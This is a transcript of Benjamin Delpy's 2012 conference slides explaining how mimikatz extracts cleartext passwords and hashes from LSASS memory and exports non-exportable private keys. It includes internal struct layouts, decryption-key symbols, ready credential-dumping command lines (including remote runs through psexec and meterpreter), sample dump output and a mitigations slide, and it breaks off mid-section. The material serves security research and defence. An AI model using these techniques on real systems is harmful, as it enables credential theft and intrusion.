Transcript Read about mimikatz and how it works

mimikatz
Benjamin DELPY `gentilkiwi`
focus on sekurlsa/pass-the-pass
and crypto patches
Who ? Why ?
Benjamin DELPY `gentilkiwi`
–
–
–
–
French
26y
Kiwi addict
Lazy programmer
Started to code mimikatz to :
– explain security concepts ;
– improve my knowledge ;
– prove to Microsoft that sometimes they must change old habits.
Why all in French ?
– because I’m 
– It limits script kiddies usage
– Hack with class
07/11/2012
Benjamin DELPY `gentilkiwi` @ ASFWS 2012
-
[email protected] ; blog.gentilkiwi.com
2
mimikatz
working
On XP, 2003, Vista, 2008, Seven, 2008r2, 8, Server 8
– x86 & x64
– 2000 support dropped with mimikatz 1.0
Everywhere ; it’s statically compiled
Two modes
– direct action (local commands)
m
i
m
i
k
a
t
z
.
e
x
e
07/11/2012
– process or driver communication
KeyIso
m
i
m
i
k
a
t
z
.
e
x
e
« Isolation de clé CNG »
LSASS.EXE
Direct action :
crypto::patchcng
EventLog
« Journal d’événements Windows »
SVCHOST.EXE
Direct action :
divers::eventdrop
Benjamin DELPY `gentilkiwi` @ ASFWS 2012
-
SamSS
« Gestionnaire de comptes de sécurité »
LSASS.EXE


VirtualAllocEx,
WriteProcessMemory,
CreateRemoteThread...
sekurlsa.dll
Open a pipe
Write a welcome message
Wait commands… and return results
[email protected] ; blog.gentilkiwi.com
3
mimikatz
architecture of sekurlsa & crypto
m
i
m
i
k
a
t
z
.
e
x
e
mod_mimikatz_standard
mod_parseur
mod_mimikatz_winmine
mod_text
mod_mimikatz_divers
mod_memory
mod_cryptoapi
mod_mimikatz_nogpo
mod_secacl
mimikatz.sys
mod_mimikatz_impersonate
mod_mimikatz_crypto
mod_mimikatz_inject
mod_mimikatz_samdump
mod_pipe
kappfree.dll
mod_cryptoacng
mod_inject
mod_mimikatz_handle
mod_hive
mod_mimikatz_privilege
mod_patch
mod_mimikatz_system
msv_1_0
mod_privilege
mod_mimikatz_service
tspkg
mod_system
mod_mimikatz_sekurlsa
wdigest
mod_service
mod_mimikatz_process
livessp
mod_process
mod_mimikatz_thread
kerberos
mod_thread
mod_mimikatz_terminalserver
07/11/2012
mod_crypto
kelloworld.dll
sam
klock.dll
msv_1_0
sekurlsa.dll
tspkg
wdigest
livessp
kerberos
mod_ts
Benjamin DELPY `gentilkiwi` @ ASFWS 2012
secrets
-
[email protected] ; blog.gentilkiwi.com
4
mimikatz :: sekurlsa
mod_mimikatz_sekurlsa
what is it ?
A module replacement for my previous favorite library !
A local module that can read data from the SamSS Service (well
known LSASS process)
What sekurlsa module can dump :
–
–
–
–
–
–
MSV1_0
TsPkg
Wdigest
LiveSSP
Kerberos
…?
07/11/2012
hashes
passwords
passwords
passwords
passwords (!)
Benjamin DELPY `gentilkiwi` @ ASFWS 2012
-
[email protected] ; blog.gentilkiwi.com
5
mimikatz :: sekurlsa
how LSA works (
PLAYSKOOL
level)
Authentication
LsaSS
WinLogon
user:domain:password
msv1_0
SAM
kerberos
Authentication
Packages
Challenge
Response
msv1_0
tspkg
wdigest
livessp
kerberos
07/11/2012
Benjamin DELPY `gentilkiwi` @ ASFWS 2012
-
[email protected] ; blog.gentilkiwi.com
6
mimikatz :: sekurlsa
how LSA works (
PLAYSKOOL
level)
Authentication packages :
– take user’s credentials from the logon
– make their own stuff
– keep enough data in memory to compute responses of
challenges (Single Sign On)
If we can get data, and inject it in another session of
LSASS, we avoid authentication part
This is the principle of « Pass-the-hash »
– In fact, of « Pass-the-x »
07/11/2012
Benjamin DELPY `gentilkiwi` @ ASFWS 2012
-
[email protected] ; blog.gentilkiwi.com
7
mimikatz :: sekurlsa
history of « pass-the-* » 1/2
Pass-the-hash
– 1997 - Unix modified SAMBA client for Hashes usage ; Paul Ashton (EIGEN)
– 2000 - Private version of a Windows « LSA Logon Session Editor » ; Hernan
Ochoa (CoreSecurity)
– 2007 - TechEd @ Microsoft ; Marc Murray (TrueSec) present msvctl, and
provide some downloads of it 
– 2007 - « Pass the hash toolkit » published ; Hernan Ochoa (CoreSecurity)
– 2007 - mimikatz 0.1 includes pass the hash and is publicly available for x86
& x64 versions of Windows (yeah, by myself but in French; so not famous ;))
2007 was the year of pass the hash !
Pass-the-ticket
– 04/2011 - wce (pass the hash toolkit evolution) provides Kerberos ticket
support; Hernan Ochoa (Ampliasecurity)
07/11/2012
Benjamin DELPY `gentilkiwi` @ ASFWS 2012
-
[email protected] ; blog.gentilkiwi.com
8
mimikatz :: sekurlsa
history of « pass-the-* » 2/2
Pass-the-pass
– 05/2011 – mimikatz 1.0 dumps first clear text passwords from TsPkg provider (but limited to NT
6 and some XP SP3)
•
http://blog.gentilkiwi.com/securite/pass-the-pass
– 05/2011 – return of mimikatz ; it dumps clear text passwords from WDigest provider (unlimited
this time ;))
•
http://blog.gentilkiwi.com/securite/re-pass-the-pass
– 05/2011 – Some organizations opened cases to Microsoft about it…
…Lots of time…
– begin of 2012 - Lots of blogs (and Kevin Mitnick ;)) say few words about mimikatz
– 03/2012 - Hernan Ochoa (Ampliasecurity) publish at seclists that wce support WDigest password
extract…
•
http://seclists.org/pen-test/2012/Mar/7
– 03/2012 – mimikatz strikes again with LiveSSP provider and extracts Live login passwords from
Windows 8 memory
•
http://blog.gentilkiwi.com/securite/rere-pass-the-pass
– 03/2012 – yeah, once again…, more curious but Kerberos keeps passwords in memory
•
http://blog.gentilkiwi.com/securite/rerere-pass-the-pass
– 08/2012 – sekurlsa module without injection at all ! (ultra safe)
•
07/11/2012
http://blog.gentilkiwi.com/securite/mimikatz/sekurlsa-fait-son-apparition
Benjamin DELPY `gentilkiwi` @ ASFWS 2012
-
[email protected] ; blog.gentilkiwi.com
9
mimikatz :: sekurlsa :: tspkg
because sometimes hash is not enough…
07/11/2012
Benjamin DELPY `gentilkiwi` @ ASFWS 2012
-
[email protected] ; blog.gentilkiwi.com
10
mimikatz :: sekurlsa :: tspkg
what is it ?
Microsoft introduces SSO capability for Terminal Server with
NT 6 to improve RemoteApps and RemoteDestkop users’s
experience
– http://technet.microsoft.com/library/cc772108.aspx
Rely on CredSSP with Credentials Delegation (!= Account
delegation)
– Specs : http://download.microsoft.com/download/9/5/e/95ef66af9026-4bb0-a41d-a4f81802d92c/%5Bms-cssp%5D.pdf
First impression : it seems cool 
– User does not have to type its password
– Password is not in RDP file
– Password is not in user secrets
07/11/2012
Benjamin DELPY `gentilkiwi` @ ASFWS 2012
-
[email protected] ; blog.gentilkiwi.com
11
mimikatz :: sekurlsa :: tspkg
questions ?
KB says that for it works, we must enable « Default
credentials
– “Default credentials : The credentials obtained when
Windows” - https://msdn.microsoft.com/library/bb204773.aspx
» delegation
the user first logs on to
• What ? Our User/Domain/{Password | Hash | Ticket} ? It seems …
– In all cases, system seems to be vulnerable to pass-the-*…
In what form ?
Our specs : [MS-CSSP]
– 2.2.1.2.1 TSPasswordCreds
• The TSPasswordCreds structure contains the user's password credentials that are delegated
to the server. (or PIN)
TSPasswordCreds ::= SEQUENCE {
domainName [0] OCTET STRING,
userName [1] OCTET STRING,
password [2] OCTET STRING
}
– Challenge / response for authentication ?
• Serveur : YES (TLS / Kerberos)
• Client : NO ; *password* is sent to server…
So password resides somewhere in memory ?
07/11/2012
Benjamin DELPY `gentilkiwi` @ ASFWS 2012
-
[email protected] ; blog.gentilkiwi.com
12
mimikatz :: sekurlsa :: tspkg
symbols & theory
Let’s explore some symbols !
kd> x tspkg!*clear*
75016d1c
tspkg!TSObtainClearCreds = <no type information>
kd> x tspkg!*password*
75011b68
tspkg!TSDuplicatePassword = <no type information>
75011cd4
tspkg!TSHidePassword = <no type information>
750195ee
tspkg!TSRevealPassword = <no type information>
75012fbd
tspkg!TSUpdateCredentialsPassword = <no type information>
kd> x tspkg!*locate*
7501158b
tspkg!TSCredTableLocateDefaultCreds = <no type information>
– sounds cool… (thanks Microsoft)
Let’s imagine a scenario
–
Enumerate all sessions to obtain :
•
•
•
–
Call tspkg!TSCredTableLocateDefaultCreds (rely on RtlLookupElementGenericTableAvl) with
LUID to obtain :
•
–
Username
Domain
LUID
TS_CREDENTIAL
Call tspkg!TSObtainClearCreds (rely on LsaUnprotectMemory) with TS_CREDENTIAL data
(TS_PRIMARY_CREDENTIAL) for :
•
07/11/2012
TS_PRIMARY_CREDENTIAL with clear text credentials…
Benjamin DELPY `gentilkiwi` @ ASFWS 2012
-
[email protected] ; blog.gentilkiwi.com
13
mimikatz :: sekurlsa :: tspkg
workflow
LsaEnumerateLogonSessions
for each LUID
KIWI_TS_CREDEN
TIAL
tspkg!TSGlobal
CredTable
typedef struct _KIWI_TS_CREDENTIAL {
#ifdef _M_X64
BYTE unk0[108];
#elif defined _M_IX86
BYTE unk0[64];
#endif
LUID LocallyUniqueIdentifier;
PVOID unk1;
PVOID unk2;
PKIWI_TS_PRIMARY_CREDENTIAL pTsPrimary;
} KIWI_TS_CREDENTIAL, *PKIWI_TS_CREDENTIAL;
typedef struct _KIWI_TS_PRIMARY_CREDENTIAL {
PVOID unk0;
LSA_UNICODE_STRING Domaine;
LSA_UNICODE_STRING UserName;
LSA_UNICODE_STRING Password;
} KIWI_TS_PRIMARY_CREDENTIAL,
*PKIWI_TS_PRIMARY_CREDENTIAL;
RtlLookupElementGenericTabl
eAvl
KIWI_TS_CREDEN
TIAL
KIWI_TS_PRIMAR
Y_CREDENTIAL
LsaUnprotectMemory
password
in clear !
07/11/2012
Benjamin DELPY `gentilkiwi` @ ASFWS 2012
-
[email protected] ; blog.gentilkiwi.com
14
mimikatz :: sekurlsa :: tspkg
demo time !
sekurlsa::tspkg
07/11/2012
Benjamin DELPY `gentilkiwi` @ ASFWS 2012
-
[email protected] ; blog.gentilkiwi.com
15
mimikatz :: sekurlsa :: wdigest
because clear text password over http/https is not cool
07/11/2012
Benjamin DELPY `gentilkiwi` @ ASFWS 2012
-
[email protected] ; blog.gentilkiwi.com
16
mimikatz :: sekurlsa :: wdigest
what is it ?
“Digest access authentication is one of the agreed-upon methods a
web server can use to negotiate credentials with a user's web
browser. It applies a hash function to a password before sending it
over the network […]”
Wikipedia : http://en.wikipedia.org/wiki/Digest_access_authentication
“Common Digest Authentication Scenarios :
– Authenticated client access to a Web site
– Authenticated client access using SASL
– Authenticated client access with integrity protection to a directory service
using LDAP”
Microsoft : http://technet.microsoft.com/library/cc778868.aspx
Again, it seems cool 
– No password over the network, just hashes
– No reversible password in Active Directory ; hashes for each realm
• Only with Advanced Digest authentication
07/11/2012
Benjamin DELPY `gentilkiwi` @ ASFWS 2012
-
[email protected] ; blog.gentilkiwi.com
17
mimikatz :: sekurlsa :: wdigest
what is it ?
We speak about hashes, but what hashes ?
H = MD5(HA1:nonce:[…]:HA2)
• HA1 = MD5(username:realm:password)
• HA2 = MD5(method:digestURI:[…])
Even after login, HA1 may change… realm is from server side
and cannot be determined before Windows logon
WDigest provider must have elements to compute responses
for different servers :
– Username
– Realm (from server)
– Password
07/11/2012
Benjamin DELPY `gentilkiwi` @ ASFWS 2012
-
[email protected] ; blog.gentilkiwi.com
18
mimikatz :: sekurlsa :: wdigest
theory
This time, we know :
– that WDigest keeps password in memory « by protocol » for HA1 digest
– that LSASS love to unprotect password with LsaUnprotectMemory (so protect
with LsaProtectMemory)
LsaUnprotectMemory
– At offset 0xb4 of LSA_SECPKG_FUNCTION_TABLE
– Let’s perform a research in WDigest :
.text:7409D151 _DigestCalcHA1@8
call
dword ptr [eax+0B4h]
– Hypothesis seems verified 
LsaProtectMemory
– At offset 0xb0 of LSA_SECPKG_FUNCTION_TABLE
– Let’s perform a research in WDigest :
.text:74096C69 _SpAcceptCredentials@16 call
dword ptr [eax+0B0h]
– SpAcceptCredentials takes clear password in args
• Protect it with LsaProtectMemory
• Update or insert data in double linked list : wdigest!l_LogSessList
07/11/2012
Benjamin DELPY `gentilkiwi` @ ASFWS 2012
-
[email protected] ; blog.gentilkiwi.com
19
mimikatz :: sekurlsa :: wdigest
workflow
typedef struct _KIWI_WDIGEST_LIST_ENTRY {
struct _KIWI_WDIGEST_LIST_ENTRY *Flink;
struct _KIWI_WDIGEST_LIST_ENTRY *Blink;
DWORD UsageCount;
struct _KIWI_WDIGEST_LIST_ENTRY *This;
LUID
LocallyUniqueIdentifier;
[…]
LSA_UNICODE_STRING UserName;
LSA_UNICODE_STRING Domaine;
LSA_UNICODE_STRING Password;
[…]
} KIWI_WDIGEST_LIST_ENTRY,
*PKIWI_WDIGEST_LIST_ENTRY;
LsaEnumerateLogonSessions
for each LUID
wdigest!l_LogS
essList
search linked list for LUID
KIWI_WDIGEST_L
IST_ENTRY
LsaUnprotectMemory
password
in clear !
07/11/2012
Benjamin DELPY `gentilkiwi` @ ASFWS 2012
-
[email protected] ; blog.gentilkiwi.com
20
mimikatz :: sekurlsa :: wdigest
demo time !
sekurlsa::wdigest
07/11/2012
Benjamin DELPY `gentilkiwi` @ ASFWS 2012
-
[email protected] ; blog.gentilkiwi.com
21
mimikatz :: sekurlsa :: livessp
because Microsoft was too good in closed networks
07/11/2012
Benjamin DELPY `gentilkiwi` @ ASFWS 2012
-
[email protected] ; blog.gentilkiwi.com
22
mimikatz :: sekurlsa :: livessp
how
Actually I’ve only used logical (empirical) approach to
search passwords… :
– Protocol reading
– Symbols searching
~ Boring ~… be more brutal this time : make a WinDBG trap !
0: kd> !process 0 0 lsass.exe
PROCESS 83569040 SessionId: 0 Cid: 0224
Peb: 7f43f000 ParentCid: 01b4
DirBase: 5df58100 ObjectTable: 80ce4740 HandleCount: <Data Not Accessible>
Image: lsass.exe
0: kd> .process /i 83569040
You need to continue execution (press 'g' <enter>) for the context
to be switched. When the debugger breaks in again, you will be in
the new process context.
0: kd> g
Break instruction exception - code 80000003 (first chance)
nt!RtlpBreakWithStatusInstruction:
814b39d0 cc
int
3
0: kd> .reload /user
Loading User Symbols
............................................................
0: kd> bp /p @$proc lsasrv!LsaProtectMemory "kc 5 ; g"
0: kd> g
07/11/2012
Benjamin DELPY `gentilkiwi` @ ASFWS 2012
-
[email protected] ; blog.gentilkiwi.com
23
mimikatz :: sekurlsa :: livessp
how
Let’s login with a Live account on Windows 8 !
lsasrv!LsaProtectMemory
livessp!LiveMakeSupplementalCred
livessp!LiveMakeSecPkgCredentials
livessp!LsaApLogonUserEx2
livessp!SpiLogonUserEx2
Our LiveSSP provider
lsasrv!LsaProtectMemory
msv1_0!NlpAddPrimaryCredential
msv1_0!SspAcceptCredentials
msv1_0!SpAcceptCredentials
Yeah, Pass the Hash capability with Live
account too…
lsasrv!LsaProtectMemory
tspkg!TSHidePassword
tspkg!SpAcceptCredentials
Live user can logon through RDP via SSO
1: kd> uf /c livessp!LsaApLogonUserEx2
livessp!LsaApLogonUserEx2 (74781536)
[...]
livessp!LsaApLogonUserEx2+0x560 (74781a96):
call to livessp!LiveCreateLogonSession (74784867)
After credentials protection, LsaApLogonUserEx2 calls
LiveCreateLogonSession to insert data in
LiveGlobalLogonSessionList (similar to WDigest)
07/11/2012
Benjamin DELPY `gentilkiwi` @ ASFWS 2012
-
[email protected] ; blog.gentilkiwi.com
24
mimikatz :: sekurlsa :: livessp
workflow
typedef struct _KIWI_LIVESSP_LIST_ENTRY {
struct _KIWI_LIVESSP_LIST_ENTRY *Flink;
struct _KIWI_LIVESSP_LIST_ENTRY *Blink;
PVOID unk0;
PVOID unk1;
PVOID unk2;
PVOID unk3;
DWORD unk4;
DWORD unk5;
PVOID unk6;
LUID LocallyUniqueIdentifier;
LSA_UNICODE_STRING UserName;
PVOID unk7;
PKIWI_LIVESSP_PRIMARY_CREDENTIAL suppCreds;
} KIWI_LIVESSP_LIST_ENTRY,
*PKIWI_LIVESSP_LIST_ENTRY;
LsaEnumerateLogonSessions
for each LUID
livessp!LiveGloba
lLogonSessionList
search linked list for LUID
KIWI_LIVESSP_LIS
T_ENTRY
KIWI_LIVESSP_PRI
MARY_CREDENTIAL
typedef struct _KIWI_LIVESSP_PRIMARY_CREDENTIAL {
DWORD isSupp;
DWORD unk0;
LSA_UNICODE_STRING UserName;
LSA_UNICODE_STRING Domaine;
LSA_UNICODE_STRING Password;
} KIWI_LIVESSP_PRIMARY_CREDENTIAL,
*PKIWI_LIVESSP_PRIMARY_CREDENTIAL;
LsaUnprotectMemory
password
in clear !
07/11/2012
Benjamin DELPY `gentilkiwi` @ ASFWS 2012
-
[email protected] ; blog.gentilkiwi.com
25
mimikatz :: sekurlsa
Even if we already have tools for normal accounts, are you
not curious to test one with this trap ?*
* Me, yes
07/11/2012
Benjamin DELPY `gentilkiwi` @ ASFWS 2012
-
[email protected] ; blog.gentilkiwi.com
26
mimikatz :: sekurlsa :: kerberos
Let’s login normal account
lsasrv!LsaProtectMemory
kerberos!KerbHideKey
kerberos!KerbCreatePrimaryCredentials
kerberos!KerbCreateLogonSession
kerberos!SpAcceptCredentials
Kerberos, ticket part ? Maybe ;)
lsasrv!LsaProtectMemory
kerberos!KerbHidePassword
kerberos!KerbCreateLogonSession
kerberos!SpAcceptCredentials
Kerberos part for password ??????
lsasrv!LsaProtectMemory
msv1_0!NlpAddPrimaryCredential
msv1_0!SspAcceptCredentials
msv1_0!SpAcceptCredentials
lsasrv!LsaProtectMemory
wdigest!SpAcceptCredentials
lsasrv!LsaProtectMemory
tspkg!TSHidePassword
tspkg!SpAcceptCredentials
After credentials protection, KerbCreateLogonSession calls :
– NT6 ; KerbInsertOrLocateLogonSession to insert data in
KerbGlobalLogonSessionTable
– NT5 ; KerbInsertLogonSession to insert data in
KerbLogonSessionList
07/11/2012
Benjamin DELPY `gentilkiwi` @ ASFWS 2012
-
[email protected] ; blog.gentilkiwi.com
27
mimikatz :: sekurlsa :: kerberos (nt6)
workflow
LsaEnumerateLogonSessions
for each LUID
Kerberos!KerbG
lobalLogonSess
ionTable
KIWI_KERBEROS_PR
IMARY_CREDENTIAL
RtlLookupElementGenericTabl
eAvl
KIWI_KERBEROS_PR
IMARY_CREDENTIAL
LsaUnprotectMemory
typedef struct _KIWI_KERBEROS_PRIMARY_CREDENTIAL
{
DWORD unk0;
PVOID unk1;
PVOID unk2;
PVOID unk3;
#ifdef _M_X64
BYTE unk4[32];
#elif defined _M_IX86
BYTE unk4[20];
#endif
LUID LocallyUniqueIdentifier;
#ifdef _M_X64
BYTE unk5[44];
#elif defined _M_IX86
BYTE unk5[36];
#endif
LSA_UNICODE_STRING UserName;
LSA_UNICODE_STRING Domaine;
LSA_UNICODE_STRING Password;
} KIWI_KERBEROS_PRIMARY_CREDENTIAL,
*PKIWI_KERBEROS_PRIMARY_CREDENTIAL;
password
in clear !
07/11/2012
Benjamin DELPY `gentilkiwi` @ ASFWS 2012
-
[email protected] ; blog.gentilkiwi.com
28
mimikatz :: sekurlsa :: kerberos (nt5)
workflow
typedef struct _KIWI_KERBEROS_LOGON_SESSION {
struct _KIWI_KERBEROS_LOGON_SESSION *Flink;
struct _KIWI_KERBEROS_LOGON_SESSION *Blink;
DWORD UsageCount;
PVOID unk0;
PVOID unk1;
PVOID unk2;
DWORD unk3;
DWORD unk4;
PVOID unk5;
PVOID unk6;
PVOID unk7;
LUID LocallyUniqueIdentifier;
#ifdef _M_IX86
DWORD unk8;
#endif
DWORD unk9;
DWORD unk10;
PVOID unk11;
DWORD unk12;
DWORD unk13;
PVOID unk14;
PVOID unk15;
PVOID unk16;
[…]
LSA_UNICODE_STRING UserName;
LSA_UNICODE_STRING Domaine;
LSA_UNICODE_STRING Password;
} KIWI_KERBEROS_LOGON_SESSION,
*PKIWI_KERBEROS_LOGON_SESSION;
LsaEnumerateLogonSessions
for each LUID
kerberos!KerbLog
onSessionList
search linked list for LUID
KIWI_LIVESSP_PRI
MARY_CREDENTIAL
LsaUnprotectMemory
password
in clear !
07/11/2012
Benjamin DELPY `gentilkiwi` @ ASFWS 2012
-
[email protected] ; blog.gentilkiwi.com
29
mimikatz :: sekurlsa
demo time !
Final sekurlsa demo sekurlsa::logonPasswords full
07/11/2012
Benjamin DELPY `gentilkiwi` @ ASFWS 2012
-
[email protected] ; blog.gentilkiwi.com
30
mimikatz :: sekurlsa :: kerberos
“hu ?”
Ok It works…*
But why ?
* Not at all logon on NT5 (can need an unlock)
From my understanding of Microsoft explanations
– no need of passwords for the Kerberos protocol…
– all is based on the hash (not very sexy too)
Microsoft’s implementation of Kerberos is full of logical…
– For password auth :
• password hash for shared secret, but keeping password in memory
– For full smartcard auth :
• No password on client
• No hash on client ?
– NTLM hash on client…
– KDC sent it back as a gift
07/11/2012
Benjamin DELPY `gentilkiwi` @ ASFWS 2012
-
[email protected] ; blog.gentilkiwi.com
31
mimikatz :: sekurlsa
All passwords in memory are encrypted, but in a reversible way to be used
We used LsaUnprotecMemory, in the LSASS context, to decrypt them
LsaUnprotectMemory
– This function rely on LsaEncryptMemory from lsasrv.dll
For that, we previously inject a DLL (sekurlsa.dll) in the LSASS process to take
benefits of its keys when we called it
Can it be fun to decrypt outside the process ?
– Yes, it is… no more injection, just reading memory of LSASS process…
mimikatz can use lsasrv.dll too and “imports” LSASS initialized keys 
– When we call LsaEncryptMemory in mimikatz, with all keys imported from LSASS, we have
the same comportments than when we are in LSASS !
07/11/2012
Benjamin DELPY `gentilkiwi` @ ASFWS 2012
-
[email protected] ; blog.gentilkiwi.com
32
mimikatz :: sekurlsa
LsaEncryptMemory NT5
Depending on the size of the secret, LsaEncryptMemory use :
– RC4
l
s
a
s
s
g_cbRandomKey
l
s
a
s
r
v
g_pRandomKey
DWORD ; 256
@BYTE[g_cbRandomKey]
BYTE[g_cbRandomKey]
copy…
– DESx
l
s
a
s
s
07/11/2012
l
s
a
s
r
v
g_pDESXKey
@BYTE[144]
BYTE[144]
g_Feedback
m
i
m
i
k
a
t
z
l
s
a
s
r
v
BYTE[8]
Benjamin DELPY `gentilkiwi` @ ASFWS 2012
-
[email protected] ; blog.gentilkiwi.com
33
mimikatz :: sekurlsa
LsaEncryptMemory NT6
Depending on the size of the secret, LsaEncryptMemory use :
InitializationVector
BYTE[16]
– 3DES
l
s
a
s
s
l
s
a
s
r
v
h3DesKey
copy…
– AES
l
s
a
s
s
07/11/2012
l
s
a
s
r
v
hAesKey
Benjamin DELPY `gentilkiwi` @ ASFWS 2012
-
m
i
m
i
k
a
t
z
l
s
a
s
r
v
typedef struct _KIWI_BCRYPT_KEY_DATA {
DWORD size;
DWORD tag;
DWORD type;
DWORD unk0;
DWORD unk1;
DWORD unk2;
DWORD unk3;
PVOID unk4;
BYTE data; /* etc... */
} KIWI_BCRYPT_KEY_DATA,
*PKIWI_BCRYPT_KEY_DATA;
typedef struct _KIWI_BCRYPT_KEY {
DWORD size;
DWORD type;
PVOID unk0;
PKIWI_BCRYPT_KEY_DATA cle;
PVOID unk1;
} KIWI_BCRYPT_KEY, *PKIWI_BCRYPT_KEY;
[email protected] ; blog.gentilkiwi.com
34
mimikatz :: sekurlsa
memo
Security Packages
Package
Symbols
Type
tspkg
tspkg!TSGlobalCredTable
RTL_AVL_TABLE
wdigest
wdigest!l_LogSessList
LIST_ENTRY
livessp
livessp!LiveGlobalLogonSessionList
LIST_ENTRY
kerberos (nt5)
kerberos!KerbLogonSessionList
LIST_ENTRY
kerberos (nt6)
kerberos!KerbGlobalLogonSessionTable
RTL_AVL_TABLE
msv1_0
lsasrv!LogonSessionList
lsasrv!LogonSessionListCount
LIST_ENTRY
ULONG
Protection Keys
Key NT 5
RC4
DESx
07/11/2012
Symbols
Key NT 6
lsasrv!g_cbRandomKey
lsasrv!g_pRandomKey
lsasrv!InitializationVector
lsasrv!g_pDESXKey
lsasrv!g_Feedback
Benjamin DELPY `gentilkiwi` @ ASFWS 2012
Symbols
-
3DES
lsasrv!h3DesKey
AES
lsasrv!hAesKey
[email protected] ; blog.gentilkiwi.com
35
mimikatz :: sekurlsa
memo
Some commands :
 mimikatz privilege::debug "sekurlsa::logonPasswords full" exit
 psexec \\windows -s -c c:\mimikatz\Win32\mimikatz.exe "sekurlsa::logonPasswords full" exit
 meterpreter > execute -H -c -i -m -f /pentest/passwords/mimikatz/mimikatz_x86.exe
mimikatz 1.0 x64 (RC)
/* Traitement du Kiwi (Aug
// http://blog.gentilkiwi.com/mimikatz
2 2012 01:32:28) */
mimikatz # privilege::debug
Demande d'ACTIVATION du privilège : SeDebugPrivilege : OK
mimikatz # sekurlsa::logonPasswords full
Authentification Id
: 0;234870
Package d'authentification : NTLM
Utilisateur principal
: Gentil Kiwi
Domaine d'authentification : vm-w8-rp-x
msv1_0 :
* Utilisateur : Gentil Kiwi
* Domaine
: vm-w8-rp-x
* Hash LM
: d0e9aee149655a6075e4540af1f22d3b
* Hash NTLM
: cc36cf7a8514893efccd332446158b1a
kerberos :
* Utilisateur : Gentil Kiwi
* Domaine
: vm-w8-rp-x
* Mot de passe : waza1234/
wdigest :
* Utilisateur : Gentil Kiwi
* Domaine
: vm-w8-rp-x
* Mot de passe : waza1234/
tspkg :
* Utilisateur : Gentil Kiwi
* Domaine
: vm-w8-rp-x
* Mot de passe : waza1234/
livessp :
n.t. (LUID KO)
07/11/2012
Benjamin DELPY `gentilkiwi` @ ASFWS 2012
-
[email protected] ; blog.gentilkiwi.com
36
mimikatz :: sekurlsa
what we can do ?
Basics
–
–
–
–
–
–
–
–
No physical access to computer (first step to pass the hash, then pass the pass)
No admin rights / system rights / debug privileges (…)
Disable local admin accounts
Strong passwords (haha, it was a joke ; so useless !!!)
For privileged account, network login instead of interactive (when possible)
Audit ; pass the hash keeps traces and can lock accounts
No admin rights / system rights / debug privileges, even VIP
Use separated network (or forest) for privileged tasks
More in depth
–
–
–
–
–
Force strong authentication (SmartCard & Token) : $ / €
Short validity for Kerberos tickets
No delegation
Disable NTLM (available with NT6)
No exotic :
•
•
biometrics (it keeps password somewhere and push it to Windows)
single sign on
– Stop shared secrets for authentication : push Public / Private stuff (like keys ;))
– Let opportunities to stop retro compatibility
– Disable faulty providers ?
•
•
07/11/2012
Is it supported by Microsoft ?
Even if you can disable LiveSSP, TsPkg and WDigest, will you disable Kerberos and msv1_0 ?
Benjamin DELPY `gentilkiwi` @ ASFWS 2012
-
[email protected] ; blog.gentilkiwi.com
37
mimikatz :: crypto
mod_mimikatz_crypto
what is it ?
A little module that I wrote to :
– play with Windows Cryptographic API / CNG and RSA keys
– automate export of certificates/keys
• Even those which are “not” exportable 
What crypto module can do :
– List
•
•
•
•
Providers
Stores
Certificates
Keys
– Export
• Certificates
•
– public in DER format
– with private keys in PFX format
Private keys in PVK format
– it’s cool, OpenSSL can deal with it too 
– Patch
07/11/2012
•
CryptoAPI in mimikatz context
•
CNG in LSASS context (again !)
Benjamin DELPY `gentilkiwi` @ ASFWS 2012
-
[email protected] ; blog.gentilkiwi.com
38
mimikatz :: crypto
how it’s protected
Private keys are DPAPI protected
– You cannot reuse private key files on another computer
• At least without the master keys and/or password of users
Computer/User can load their own keys because they have enough
secrets to do it (ex : session opened)
– Yes, a computer/server open a “session”
Export/Usage can be limited by :
– Password
Constraint for most user
Unavailable for computer keys
– Popup
– Export/Archive flag no present
certutil -importpfx mycert.p12 NoExport
certutil -csp "Microsoft Enhanced Cryptographic Provider v1.0" -importpfx mycert.p12 NoExport
07/11/2012
Benjamin DELPY `gentilkiwi` @ ASFWS 2012
-
[email protected] ; blog.gentilkiwi.com
39
mimikatz :: crypto :: capi
how it works
“Microsoft CryptoAPI provides a secure interface for the cryptographic functionality that is
supplied by the installable cryptographic service provider (CSP) modules. CSPs perform all
cryptographic operations and manage private keys CSPs can be implemented in software
as well as in hardware.”
–
http://technet.microsoft.com/library/cc962093.aspx
Processes (mimikatz, IIS, Active Directory , Internet Explorer, yourappshere…) load some
DLL to deal with different cryptographic stuff : CSP (keys), smartcard reader, …
–
cryptdll.dll, rsaenh.dll, …
Process deal with cryptographic keys by this API…
07/11/2012
Benjamin DELPY `gentilkiwi` @ ASFWS 2012
-
[email protected] ; blog.gentilkiwi.com
40
mimikatz :: crypto :: capi
how it’s exported (
PLAYSKOOL
level)
Process
CryptoAPI and RSA CSP
Load Private Key
Exportable
?
DPAPI Decode
yes
no
Ask to export Key
07/11/2012
Benjamin DELPY `gentilkiwi` @ ASFWS 2012
NTE_BAD_KEY_STATE
-
Exported Key
[email protected] ; blog.gentilkiwi.com
41
mimikatz :: crypto :: patchcapi
because I own my process
When we want to export a certificate with its private key (or only the key), it goes in
rsaenh!CPExportKey
This function do all the work to prepare the export, and check if the key is exportable
Exportable
?
================ Certificat 0 ================
Numéro de série : 112169417a1c3ef46a301f99385f50680fa0
Émetteur: CN=GlobalSign CodeSigning CA - G2, O=GlobalSign nv-sa, C=BE
Objet: CN=Benjamin Delpy, C=FR
Il ne s'agit pas d'un certificat racine
Hach. cert. (sha1): ab 9e 92 b9 43 ed 47 d9 15 bc 26 93 9e 24 a5 83 03 ac aa 7e
Conteneur de clé = {470ADFBA-8718-4014-B05E-B30776B75A03}
Fournisseur = Microsoft Enhanced Cryptographic Provider v1.0
La clé privée NE PEUT PAS être exportée
Succès du test de cryptage
CertUtil : -exportPFX ÉCHEC de la commande : 0x8009000b (-2146893813)
CertUtil: Clé non valide pour l'utilisation dans l'état spécifié.
mimikatz # crypto::exportCertificates
Emplacement : 'CERT_SYSTEM_STORE_CURRENT_USER'\My
- Benjamin Delpy
Container Clé : {470ADFBA-8718-4014-B05E-B30776B75A03}
Provider
: Microsoft Enhanced Cryptographic Provider v1.0
Type
: AT_KEYEXCHANGE
Exportabilité : NON
Taille clé
: 2048
Export privé dans 'CERT_SYSTEM_STORE_CURRENT_USER_My_0_Benjamin Delpy.pfx' : KO
(0x8009000b) Clé non valide pour l'utilisation dans l'état spécifié.
Export public dans 'CERT_SYSTEM_STORE_CURRENT_USER_My_0_Benjamin Delpy.der' : OK
07/11/2012
Benjamin DELPY `gentilkiwi` @ ASFWS 2012
-
